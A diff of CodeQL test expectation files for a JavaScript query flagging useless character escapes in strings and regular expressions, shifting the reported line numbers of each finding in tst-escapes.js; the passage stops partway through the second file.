b/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessCharacterEscape.expected @@ -1,59 +1,59 @@ -| tst-escapes.js:19:8:19:11 | "\\ " | The escape sequence '\\ ' is equivalent to just ' '. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\a' is equivalent to just 'a'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\e' is equivalent to just 'e'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\g' is equivalent to just 'g'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\h' is equivalent to just 'h'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\i' is equivalent to just 'i'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\j' is equivalent to just 'j'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\l' is equivalent to just 'l'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\m' is equivalent to just 'm'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\o' is equivalent to just 'o'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\q' is equivalent to just 'q'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\y' is equivalent to just 'y'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\z' is equivalent to just 'z'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\A' is equivalent to just 'A'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\C' is equivalent to just 'C'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\E' is equivalent to just 'E'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\F' is equivalent to just 'F'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\G' is equivalent to just 'G'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\H' is equivalent to just 'H'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\I' is equivalent to just 'I'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\J' is equivalent to just 'J'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\K' is equivalent to just 'K'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\L' is equivalent to just 'L'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\M' is equivalent to just 'M'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\N' is equivalent to just 'N'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\O' is equivalent to just 'O'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\Q' is equivalent to just 'Q'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\R' is equivalent to just 'R'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\T' is equivalent to just 'T'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\U' is equivalent to just 'U'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\V' is equivalent to just 'V'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\X' is equivalent to just 'X'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\Y' is equivalent to just 'Y'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\Z' is equivalent to just 'Z'. | -| tst-escapes.js:22:1:22:28 | /\\`\\1\\2 ... \\0\\-\\=/ | The escape sequence '\\=' is equivalent to just '='. | -| tst-escapes.js:22:1:22:28 | /\\`\\1\\2 ... \\0\\-\\=/ | The escape sequence '\\`' is equivalent to just '`'. | -| tst-escapes.js:23:1:23:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\!' is equivalent to just '!'. | -| tst-escapes.js:23:1:23:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\#' is equivalent to just '#'. | -| tst-escapes.js:23:1:23:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\%' is equivalent to just '%'. | -| tst-escapes.js:23:1:23:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\&' is equivalent to just '&'. | -| tst-escapes.js:23:1:23:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\@' is equivalent to just '@'. | -| tst-escapes.js:23:1:23:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\_' is equivalent to just '_'. | -| tst-escapes.js:23:1:23:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\~' is equivalent to just '~'. | -| tst-escapes.js:24:1:24:15 | /\\[\\]\\'\\\\,\\.\\// | The escape sequence '\\'' is equivalent to just '''. | -| tst-escapes.js:25:1:25:16 | /\\{\\}\\"\\\|\\<\\>\\?/ | The escape sequence '\\"' is equivalent to just '"'. | -| tst-escapes.js:25:1:25:16 | /\\{\\}\\"\\\|\\<\\>\\?/ | The escape sequence '\\<' is equivalent to just '<'. | -| tst-escapes.js:25:1:25:16 | /\\{\\}\\"\\\|\\<\\>\\?/ | The escape sequence '\\>' is equivalent to just '>'. | -| tst-escapes.js:26:1:26:4 | /\\ / | The escape sequence '\\ ' is equivalent to just ' '. | -| tst-escapes.js:29:8:29:11 | "\\a" | The escape sequence '\\a' is equivalent to just 'a'. | -| tst-escapes.js:31:8:31:13 | "\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | -| tst-escapes.js:33:8:33:15 | "\\\\\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | -| tst-escapes.js:35:8:35:17 | "\\\\\\\\\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | -| tst-escapes.js:37:8:37:19 | "\\\\\\\\\\\\\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | -| tst-escapes.js:42:1:42:4 | "\\." | The escape sequence '\\.' is equivalent to just '.'. | -| tst-escapes.js:48:8:48:15 | "'\\'\\\\'" | The escape sequence '\\'' is equivalent to just '''. | -| tst-escapes.js:50:8:50:15 | '"\\"\\\\"' | The escape sequence '\\"' is equivalent to just '"'. | -| tst-escapes.js:66:8:66:13 | "\\\\\\]" | The escape sequence '\\]' is equivalent to just ']'. | -| tst-escapes.js:67:8:67:14 | "x\\\\\\]" | The escape sequence '\\]' is equivalent to just ']'. | -| tst-escapes.js:71:8:71:17 | "\\\\\\\\\\\\\\]" | The escape sequence '\\]' is equivalent to just ']'. | +| tst-escapes.js:17:8:17:11 | "\\ " | The escape sequence '\\ ' is equivalent to just ' '. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\a' is equivalent to just 'a'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\e' is equivalent to just 'e'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\g' is equivalent to just 'g'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\h' is equivalent to just 'h'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\i' is equivalent to just 'i'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\j' is equivalent to just 'j'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\l' is equivalent to just 'l'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\m' is equivalent to just 'm'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\o' is equivalent to just 'o'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\q' is equivalent to just 'q'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\y' is equivalent to just 'y'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\z' is equivalent to just 'z'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\A' is equivalent to just 'A'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\C' is equivalent to just 'C'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\E' is equivalent to just 'E'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\F' is equivalent to just 'F'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\G' is equivalent to just 'G'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\H' is equivalent to just 'H'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\I' is equivalent to just 'I'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\J' is equivalent to just 'J'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\K' is equivalent to just 'K'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\L' is equivalent to just 'L'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\M' is equivalent to just 'M'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\N' is equivalent to just 'N'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\O' is equivalent to just 'O'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\Q' is equivalent to just 'Q'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\R' is equivalent to just 'R'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\T' is equivalent to just 'T'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\U' is equivalent to just 'U'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\V' is equivalent to just 'V'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\X' is equivalent to just 'X'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\Y' is equivalent to just 'Y'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\Z' is equivalent to just 'Z'. | +| tst-escapes.js:20:1:20:28 | /\\`\\1\\2 ... \\0\\-\\=/ | The escape sequence '\\=' is equivalent to just '='. | +| tst-escapes.js:20:1:20:28 | /\\`\\1\\2 ... \\0\\-\\=/ | The escape sequence '\\`' is equivalent to just '`'. | +| tst-escapes.js:21:1:21:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\!' is equivalent to just '!'. | +| tst-escapes.js:21:1:21:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\#' is equivalent to just '#'. | +| tst-escapes.js:21:1:21:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\%' is equivalent to just '%'. | +| tst-escapes.js:21:1:21:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\&' is equivalent to just '&'. | +| tst-escapes.js:21:1:21:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\@' is equivalent to just '@'. | +| tst-escapes.js:21:1:21:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\_' is equivalent to just '_'. | +| tst-escapes.js:21:1:21:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\~' is equivalent to just '~'. | +| tst-escapes.js:22:1:22:15 | /\\[\\]\\'\\\\,\\.\\// | The escape sequence '\\'' is equivalent to just '''. | +| tst-escapes.js:23:1:23:16 | /\\{\\}\\"\\\|\\<\\>\\?/ | The escape sequence '\\"' is equivalent to just '"'. | +| tst-escapes.js:23:1:23:16 | /\\{\\}\\"\\\|\\<\\>\\?/ | The escape sequence '\\<' is equivalent to just '<'. | +| tst-escapes.js:23:1:23:16 | /\\{\\}\\"\\\|\\<\\>\\?/ | The escape sequence '\\>' is equivalent to just '>'. | +| tst-escapes.js:24:1:24:4 | /\\ / | The escape sequence '\\ ' is equivalent to just ' '. | +| tst-escapes.js:27:8:27:11 | "\\a" | The escape sequence '\\a' is equivalent to just 'a'. | +| tst-escapes.js:29:8:29:13 | "\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | +| tst-escapes.js:31:8:31:15 | "\\\\\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | +| tst-escapes.js:33:8:33:17 | "\\\\\\\\\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | +| tst-escapes.js:35:8:35:19 | "\\\\\\\\\\\\\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | +| tst-escapes.js:40:1:40:4 | "\\." | The escape sequence '\\.' is equivalent to just '.'. | +| tst-escapes.js:46:8:46:15 | "'\\'\\\\'" | The escape sequence '\\'' is equivalent to just '''. | +| tst-escapes.js:48:8:48:15 | '"\\"\\\\"' | The escape sequence '\\"' is equivalent to just '"'. | +| tst-escapes.js:64:8:64:13 | "\\\\\\]" | The escape sequence '\\]' is equivalent to just ']'. | +| tst-escapes.js:65:8:65:14 | "x\\\\\\]" | The escape sequence '\\]' is equivalent to just ']'. | +| tst-escapes.js:69:8:69:17 | "\\\\\\\\\\\\\\]" | The escape sequence '\\]' is equivalent to just ']'. | diff --git a/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessRegExpCharacterEscape.expected b/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessRegExpCharacterEscape.expected index f7badbcbd86a..8bd58ce20b93 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessRegExpCharacterEscape.expected +++ b/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessRegExpCharacterEscape.expected @@ -1,43 +1,43 @@ -| tst-escapes.js:13:11:13:12 | '\\b' is a backspace, and not a word-boundary assertion | The escape sequence '\\b' is a backspace, and not a word-boundary assertion when it is used in a $@. | tst-escapes.js:13:8:13:61 | "\\a\\b\\c ... \\x\\y\\z" | regular expression | -| tst-escapes.js:13:13:13:14 | '\\c' is equivalent to just 'c', so the sequence is not a character class | The escape sequence '\\c' is equivalent to just 'c', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:13:8:13:61 | "\\a\\b\\c ... \\x\\y\\z" | regular expression | -| tst-escapes.js:13:15:13:16 | '\\d' is equivalent to just 'd', so the sequence is not a character class | The escape sequence '\\d' is equivalent to just 'd', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:13:8:13:61 | "\\a\\b\\c ... \\x\\y\\z" | regular expression | -| tst-escapes.js:13:29:13:30 | '\\k' is equivalent to just 'k', so the sequence is not a backreference | The escape sequence '\\k' is equivalent to just 'k', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:13:8:13:61 | "\\a\\b\\c ... \\x\\y\\z" | regular expression | -| tst-escapes.js:13:39:13:40 | '\\p' is equivalent to just 'p', so the sequence is not a character class | The escape sequence '\\p' is equivalent to just 'p', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:13:8:13:61 | "\\a\\b\\c ... \\x\\y\\z" | regular expression | -| tst-escapes.js:13:45:13:46 | '\\s' is equivalent to just 's', so the sequence is not a character class | The escape sequence '\\s' is equivalent to just 's', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:13:8:13:61 | "\\a\\b\\c ... \\x\\y\\z" | regular expression | -| tst-escapes.js:14:11:14:12 | '\\B' is equivalent to just 'B', so the sequence is not an assertion | The escape sequence '\\B' is equivalent to just 'B', so the sequence is not an assertion when it is used in a $@. | tst-escapes.js:14:8:14:59 | "\\A\\B\\C ... \\X\\Y\\Z" | regular expression | -| tst-escapes.js:14:15:14:16 | '\\D' is equivalent to just 'D', so the sequence is not a character class | The escape sequence '\\D' is equivalent to just 'D', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:14:8:14:59 | "\\A\\B\\C ... \\X\\Y\\Z" | regular expression | -| tst-escapes.js:14:39:14:40 | '\\P' is equivalent to just 'P', so the sequence is not a character class | The escape sequence '\\P' is equivalent to just 'P', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:14:8:14:59 | "\\A\\B\\C ... \\X\\Y\\Z" | regular expression | -| tst-escapes.js:14:45:14:46 | '\\S' is equivalent to just 'S', so the sequence is not a character class | The escape sequence '\\S' is equivalent to just 'S', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:14:8:14:59 | "\\A\\B\\C ... \\X\\Y\\Z" | regular expression | -| tst-escapes.js:15:11:15:12 | '\\1' is equivalent to just '1', so the sequence is not a backreference | The escape sequence '\\1' is equivalent to just '1', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:15:8:15:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | -| tst-escapes.js:15:13:15:14 | '\\2' is equivalent to just '2', so the sequence is not a backreference | The escape sequence '\\2' is equivalent to just '2', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:15:8:15:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | -| tst-escapes.js:15:15:15:16 | '\\3' is equivalent to just '3', so the sequence is not a backreference | The escape sequence '\\3' is equivalent to just '3', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:15:8:15:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | -| tst-escapes.js:15:17:15:18 | '\\4' is equivalent to just '4', so the sequence is not a backreference | The escape sequence '\\4' is equivalent to just '4', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:15:8:15:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | -| tst-escapes.js:15:19:15:20 | '\\5' is equivalent to just '5', so the sequence is not a backreference | The escape sequence '\\5' is equivalent to just '5', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:15:8:15:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | -| tst-escapes.js:15:21:15:22 | '\\6' is equivalent to just '6', so the sequence is not a backreference | The escape sequence '\\6' is equivalent to just '6', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:15:8:15:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | -| tst-escapes.js:15:23:15:24 | '\\7' is equivalent to just '7', so the sequence is not a backreference | The escape sequence '\\7' is equivalent to just '7', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:15:8:15:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | -| tst-escapes.js:15:25:15:26 | '\\8' is equivalent to just '8', so the sequence is not a backreference | The escape sequence '\\8' is equivalent to just '8', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:15:8:15:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | -| tst-escapes.js:15:27:15:28 | '\\9' is equivalent to just '9', so the sequence is not a backreference | The escape sequence '\\9' is equivalent to just '9', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:15:8:15:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | -| tst-escapes.js:15:31:15:32 | '\\-' is equivalent to just '-', so the sequence may still represent a meta-character | The escape sequence '\\-' is equivalent to just '-', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:15:8:15:35 | "\\`\\1\\2 ... \\0\\-\\=" | regular expression | -| tst-escapes.js:16:17:16:18 | '\\$' is equivalent to just '$', so the sequence may still represent a meta-character | The escape sequence '\\$' is equivalent to just '$', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:16:8:16:35 | "\\~\\!\\@ ... \\)\\_\\+" | regular expression | -| tst-escapes.js:16:21:16:22 | '\\^' is equivalent to just '^', so the sequence may still represent a meta-character | The escape sequence '\\^' is equivalent to just '^', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:16:8:16:35 | "\\~\\!\\@ ... \\)\\_\\+" | regular expression | -| tst-escapes.js:16:25:16:26 | '\\*' is equivalent to just '*', so the sequence may still represent a meta-character | The escape sequence '\\*' is equivalent to just '*', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:16:8:16:35 | "\\~\\!\\@ ... \\)\\_\\+" | regular expression | -| tst-escapes.js:16:27:16:28 | '\\(' is equivalent to just '(', so the sequence may still represent a meta-character | The escape sequence '\\(' is equivalent to just '(', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:16:8:16:35 | "\\~\\!\\@ ... \\)\\_\\+" | regular expression | -| tst-escapes.js:16:29:16:30 | '\\)' is equivalent to just ')', so the sequence may still represent a meta-character | The escape sequence '\\)' is equivalent to just ')', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:16:8:16:35 | "\\~\\!\\@ ... \\)\\_\\+" | regular expression | -| tst-escapes.js:16:33:16:34 | '\\+' is equivalent to just '+', so the sequence may still represent a meta-character | The escape sequence '\\+' is equivalent to just '+', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:16:8:16:35 | "\\~\\!\\@ ... \\)\\_\\+" | regular expression | -| tst-escapes.js:17:9:17:10 | '\\[' is equivalent to just '[', so the sequence may still represent a meta-character | The escape sequence '\\[' is equivalent to just '[', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:17:8:17:22 | "\\[\\]\\'\\\\,\\.\\/" | regular expression | -| tst-escapes.js:17:11:17:12 | '\\]' is equivalent to just ']', so the sequence may still represent a meta-character | The escape sequence '\\]' is equivalent to just ']', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:17:8:17:22 | "\\[\\]\\'\\\\,\\.\\/" | regular expression | -| tst-escapes.js:17:18:17:19 | '\\.' is equivalent to just '.', so the sequence may still represent a meta-character | The escape sequence '\\.' is equivalent to just '.', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:17:8:17:22 | "\\[\\]\\'\\\\,\\.\\/" | regular expression | -| tst-escapes.js:18:9:18:10 | '\\{' is equivalent to just '{', so the sequence may still represent a meta-character | The escape sequence '\\{' is equivalent to just '{', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:18:8:18:25 | "\\{\\}\\\\\\"\\\|\\<\\>\\?" | regular expression | -| tst-escapes.js:18:11:18:12 | '\\}' is equivalent to just '}', so the sequence may still represent a meta-character | The escape sequence '\\}' is equivalent to just '}', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:18:8:18:25 | "\\{\\}\\\\\\"\\\|\\<\\>\\?" | regular expression | -| tst-escapes.js:18:17:18:18 | '\\\|' is equivalent to just '\|', so the sequence may still represent a meta-character | The escape sequence '\\\|' is equivalent to just '\|', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:18:8:18:25 | "\\{\\}\\\\\\"\\\|\\<\\>\\?" | regular expression | -| tst-escapes.js:18:23:18:24 | '\\?' is equivalent to just '?', so the sequence may still represent a meta-character | The escape sequence '\\?' is equivalent to just '?', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:18:8:18:25 | "\\{\\}\\\\\\"\\\|\\<\\>\\?" | regular expression | -| tst-escapes.js:41:9:41:10 | '\\.' is equivalent to just '.', so the sequence may still represent a meta-character | The escape sequence '\\.' is equivalent to just '.', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:41:8:41:11 | "\\." | regular expression | -| tst-escapes.js:56:10:56:11 | '\\.' is equivalent to just '.', so the sequence may still represent a meta-character | The escape sequence '\\.' is equivalent to just '.', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:56:8:56:13 | "[\\.]" | regular expression | -| tst-escapes.js:57:12:57:13 | '\\.' is equivalent to just '.', so the sequence may still represent a meta-character | The escape sequence '\\.' is equivalent to just '.', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:57:8:57:17 | "a[b\\.c]d" | regular expression | -| tst-escapes.js:60:9:60:10 | '\\k' is equivalent to just 'k', so the sequence is not a backreference | The escape sequence '\\k' is equivalent to just 'k', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:60:8:60:19 | `\\k\\\\k\\d\\\\d` | regular expression | -| tst-escapes.js:60:14:60:15 | '\\d' is equivalent to just 'd', so the sequence is not a character class | The escape sequence '\\d' is equivalent to just 'd', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:60:8:60:19 | `\\k\\\\k\\d\\\\d` | regular expression | -| tst-escapes.js:61:9:61:10 | '\\k' is equivalent to just 'k', so the sequence is not a backreference | The escape sequence '\\k' is equivalent to just 'k', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:61:8:61:25 | `\\k\\\\k${foo}\\d\\\\d` | regular expression | -| tst-escapes.js:61:20:61:21 | '\\d' is equivalent to just 'd', so the sequence is not a character class | The escape sequence '\\d' is equivalent to just 'd', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:61:8:61:25 | `\\k\\\\k${foo}\\d\\\\d` | regular expression | -| tst-escapes.js:64:9:64:10 | '\\]' is equivalent to just ']', so the sequence may still represent a meta-character | The escape sequence '\\]' is equivalent to just ']', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:64:8:64:11 | "\\]" | regular expression | -| tst-escapes.js:69:13:69:14 | '\\]' is equivalent to just ']', so the sequence may still represent a meta-character | The escape sequence '\\]' is equivalent to just ']', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:69:8:69:15 | "\\\\\\\\\\]" | regular expression | -| tst-escapes.js:73:17:73:18 | '\\]' is equivalent to just ']', so the sequence may still represent a meta-character | The escape sequence '\\]' is equivalent to just ']', so the sequence may still represent a meta-character when it is used in a $@. | tst-escapes.js:73:8:73:19 | "\\\\\\\\\\\\\\\\\\]" | regular expression | +| tst-escapes.js:11:11:11:12 | '\\b' is a backspace, and not a word-boundary assertion | The escape sequence '\\b' is a backspace, and not a word-boundary assertion when it is used in a $@. | tst-escapes.js:11:8:11:61 | "\\a\\b\\c ... \\x\\y\\z" | regular expression | +| tst-escapes.js:11:13:11:14 | '\\c' is equivalent to just 'c', so the sequence is not a character class | The escape sequence '\\c' is equivalent to just 'c', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:11:8:11:61 | "\\a\\b\\c ... \\x\\y\\z" | regular expression | +| tst-escapes.js:11:15:11:16 | '\\d' is equivalent to just 'd', so the sequence is not a character class | The escape sequence '\\d' is equivalent to just 'd', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:11:8:11:61 | "\\a\\b\\c ... \\x\\y\\z" | regular expression | +| tst-escapes.js:11:29:11:30 | '\\k' is equivalent to just 'k', so the sequence is not a backreference | The escape sequence '\\k' is equivalent to just 'k', so the sequence is not a backreference when it is used in a $@. | tst-escapes.js:11:8:11:61 | "\\a\\b\\c ... \\x\\y\\z" | regular expression | +| tst-escapes.js:11:39:11:40 | '\\p' is equivalent to just 'p', so the sequence is not a character class | The escape sequence '\\p' is equivalent to just 'p', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:11:8:11:61 | "\\a\\b\\c ... \\x\\y\\z" | regular expression | +| tst-escapes.js:11:45:11:46 | '\\s' is equivalent to just 's', so the sequence is not a character class | The escape sequence '\\s' is equivalent to just 's', so the sequence is not a character class when it is used in a $@. | tst-escapes.js:11:8:11:61 | "\\a\\b\\c ... \\x\\y\\z" | regular expression | +| tst-escapes.js:12:11:12:12 | '\\B' is equivalent to just 'B', so the sequence is not an assertion | The escape sequence '\\B' is equivalent to just 'B', so the sequence is not an assertion when it is used in a $@. | tst-escapes.js:12:8:12:59 | "\\A\\B\\C ... \\X\\Y\\Z" | regular expression | +| tst-escapes.js:12:15:12:16 | '\\D' is equivalent to just 'D', so the sequence is not a character class | The escape sequence '\\D' is equivalent to just 'D', so the sequence is not a character class when it is 